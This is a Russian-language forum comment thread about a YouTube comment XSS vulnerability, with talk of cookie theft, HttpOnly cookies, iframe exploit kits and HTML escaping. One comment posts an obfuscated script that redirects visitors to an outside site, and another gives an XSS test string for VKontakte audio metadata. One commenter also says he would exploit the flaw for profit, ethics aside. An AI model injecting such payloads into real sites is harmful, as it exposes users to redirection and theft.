Уязвимость комментариев на Youtube

[@shinyweb]

Самое время сменить пароли, если переходили по «инфицированным» видео и воздержаться от просмотра видео на страницах youtube.com пока уязвимость не пофиксили! Что самое страшное: в страницу вполне можно внедрить (и внедряют) Javascript код с каким-нибудь cookie-сниффером. Вот так вот, одна ошибка в коде огромного портала может привести к тотальной угрозе для всех его пользователей.

[@neuotq]

У многих кстати это часть единого аккаунта гугла

[@Denai]

Почту заводят не для того чтобы там спам держать, а для каких-то личных вещей. Личное — важно.

[@DizzWebS]

да не кормите тролля

[@naryl]

А нефиг почту на SaaS'ах держать ;)

[@psylostlife]

Тобишь мне нужно завести трусы, чтобы чистеть зубы, когда я их почищу и начну умывать лицо — мне нужно надеть другие трусы, одену штаны — третьи, футболку — четвертныЕ, пойду покушать — пятые и так далее?
А если носки добавить?

[@psylostlife]

Извините, *чистИть*

[@dioneo]

Тобишь четвертныЕ

такдауШъ: То-бишь четвертн_ыЕ? )))

[@dioneo]

описка по Фрейду ;)

[@luckyredhot]

товарищ приверженец мэйлру?

[@hulinada]

Вот если бы это предупреждение в посте перед ссылками поставили, цены бы не было =)

[@egorinsk]

Насколько я знаю, авторизация у Ютуба, как и у других сервисов Гугла, проходит только на https://google.com/account, и автоиризационные куки с ютуба не упрешь, а сессионная кука, наверно, быстро сдохнет, и теоретически мождет быть привязана к Ip адресу.

[@psylostlife]

Неприятно, если через твой аккаунт зальют ЦП и заблокируют учетную запись во всех сервисах гугла.

[@dmitriy_b]

Там стоит HttpOnly кука, так что пофиг.

[@neuotq]

а где же ссылка на нить обсуждения? ;)
PS в массы уязвимости запустили на 4chan

[@neuotq]

Зачем же так грубо, а линк я дал, так как там больше примеров, следовательно яснее будет что за уязвимость, что прохдит что нет. И не надо пробовать, уже все за тебя испытали.

[@SilverTH]

Ужас.

[@unreal]

Наткнулся на это 5 минут назад.

[@infi]

Если iframe, то это жестко.

[@WGH]

Ну, спереть пароли-куки-пр. через iframe нельзя.

[@infi]

Зато можно поставить связку эксплоитов, а на популярных роликах трафик очень большой.

[@technocrat]

в ie 6 можно было

[@AHDPEu]

Троянов часто через фреймы раздают.
Есть очень много партнерок, которые покупают такой трафик.
Думаю на ютубе трафика много :)

[@psylostlife]

А если у меня линукс? Я не с подковыркой спрашиваю, просто интересно, чисто теоретически. Куки то оно понятно, а вот трояны пока что не для всех ведь делают?

[@ioccy]

Линукс не важен.

[@AHDPEu]

Ой да ладно вам :)
Ещё никто не отменял сплоиты под программмы для линукса. Тут дело даже не в ОС, а в том, какой софт вы используйте.
Если не с подковыркой, то я с удовольствием отвечаю на Ваш вопрос.
Ботнеты можно на сотовых телефонах, и на тостерах и холодильниках создать, что уж говорить про устройства где установлена никсоподобная ОС.
Руткиты существуют под многие ОС. Вполне возможно, с ростом популярности Убунты (это для примера) появятся с публичных связках сплоиты для получения рута, а там уже и троян не плохо будет себя чувствовать.
Всё дело времени :)

[@Nesp]

YouTube status:
[ ] Told
[x] FUCKING TOLD

[@kse_ru]

sup /g/

[@Nesp]

>implying i'm from 4chan

[@EvgeniyLazarev]

Люди ошибаются.

[@psylostlife]

Все люди ошибаются.
Все что сделано — можно сломать.
Чем проще — тем сложнее.
Первое, что пришло в голову)

[@Alucard]

«Комментарии к этому видео скрыты в соответствии с настройками безопасного режима. Показать скрытые комментарии „
Оперативно видимо работают.

[@Lenyarun]

пофиксили

[@rewiaca]

не пофиксили. Просто скрыли комментарии

[@kljaver]

У меня никаких надписей красным нет. Камменты с кодом видны. :)

[@tundrik]

Красных надписей _уже_ никто не видит

[@kljaver]

Ясно.

[@bizikov]

ютубовци оперативный народ!

[@azproduction]

Просто кто-то из работников Google читает хабр или двач :)

[@bizikov]

полюбому хДД

[@psylostlife]

Наверное, им кто-то просто сообщил в техподдержку. И я считаю, что она у них круглосуточна :)
КО?

[@bizikov]

а че такое двач? мой коммент из за этого заминусовали? м

[@AHDPEu]

да на многих крупных проектах есть XSS уязвимости.
Для примера, не очень опасный xss, Вконтакте — загрузка аудиофайлов.
Если в свойствах мп3 в поле «Исполнитель» вписать '+alert+' и загрузить — выскочит алерт.

[@Hint]

Может кто-нибудь объяснить, почему это возможно? Разве YouTube позволяет вставлять в комментарии какие-либо теги (bb или html)? Если нет, то почему они просто не заменяет все html символы на спец. коды?

[@NZeraF]

гугл его знает.

[@rednaxi]

Видимо вся соль в IF_HTML_FUNCTION?
Каким то образом ломается вырезалка html

[@barmaley_exe]

Если заменять знаки <> на их HTML сущности, то ничего вырезать не надо. Не понимаю, почему зачастую предпочитают вырезать теги.

[@rednaxi]

чтобы оставить чистый текст, очевидно.

[@rednaxi]

Чего за минуса? :)

Это же очевиндо зачем вырезают html-сущности в тех местах, где их нельзя использовать.

Если человек напишет какой нибудь комментарий и использует в нем всякие и еще 100500 тегов, обычному человеку такой текст прочитать в мешанине тегов если просто заменить < и > на < > будет сложно.

Если же вырезать html-сущености совсем то останется прсто чистый неформатированный текст, который будет удобен для чтения

[@barmaley_exe]

Посмотрим со стороны пользователя:
Я хочу видеть свое сообщение так, как я его написал. Почему мне не дают писать сообщения так, как я хочу? Безопасность безопасностью, а палки в колеса пользователю вставлять не надо.
Если в комментарии стопицот тегов, то зачем его читать? Если бы автор сообщения хотел донести свою мысль, он бы не стал «обфусцировать» свой коммент.

P.S. Минусовал не я.

[@rednaxi]

ну там где нельзя использовать html обычно прямо пишут что там нельзя использовать html и => весь html вырезается.

Мне кажется это нормально. Если есть желание вставить какой-то html-код в сообщение, то для этого есть специальные теги

<pre>

[@barmaley_exe]

А если я хочу написать HTML код обычным сообщением, мне что, заменять символы <> на сущности? А если и амперсанд заменяется? Если нет никакого форматирования сообщений, они должны отображаться именно так, как написаны.

[@menvil]

А я бы не палил эту тему в паблик а использовал ее по максимуму для выжима бабла этой вкусной темы. И к черту этику и всякие бла-бла-бла о морали.

[@persei]

А потом удивляемся =)

[@kastaneda]

откуда знаете, что по максимуму уже не выжали из этой вкусной темы? )
или, возможно, эта вкусная тема лишь отвлекающий маневр от какой-нибудь другое, еще более вкусной темы

[@technocrat]

Все равно бы заметили, если делать это в промышленных масштабах. На дваче уже и так за пару часов много чего успели попробовать — даже дорвейщики подключались и похоже не безуспешно для себя… А в целом легион постарался на славу )) img408.imageshack.us/img408/1415/1278252932293.png

[@startupper]

Редирект работал успешно. Вот вариант кода редиректа на румынских хацкеров:

<script>Zbody onLoad=”document.write(‘<script>window.location = 
String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 119, 
119, 119, 46, 105, 110, 115, 101, 99, 117, 114, 105, 116,
121, 46, 114, 111, 47);</script>’);”;

[@naryl]

Почитайте Кысь.

[@psylostlife]

Вы считаете, такая уязвимость у такого сервиса может продержаться долго, даже если её не палить? Точнее, если её «пытаться» не палить?

[@Leezarius]

Создатели FUTURAMA явно что-то знают.

[@startupper]

профиксили уже. вырезают автоматически тег со словом script

как выглядела проблема вживую можно посмотреть здесь — там видео есть

[@AlexXsWx]

Интерестно, почему ролик на ютуб не залили. Было бы весело)

[@docomo]

habrahabr.ru/blogs/google/92772/

Мда…

[@DanielDefo]

а взломали то с 4chan.org
images.4chan.org/b/src/1278259281256.jpg

[@psylostlife]

Выложите на зеркало, пожалуйста.

[@Ice_venom]

Однако, гугл лоханулся…

[@Levsha100]

Пофиксили уже =(
А я хотел пакмана пустить побегать =(

[@russum]

хы, gооgle.cоm.is.hоsted.оn.prоfithоsting.net, это я еще в 2007 делал, забыл уже… :)

[@NARKOZ]

Юзаю Noscript, потому не заметил. Кстати, во избежания таких случаев могу посоветовать: code.google.com/p/owaspantisamy

[@maniakenator]

Тоже использовал noscript, но ютуб у меня в нем был разрешен…

[@Garrett]

Возможно и неследие от создателей сервиса.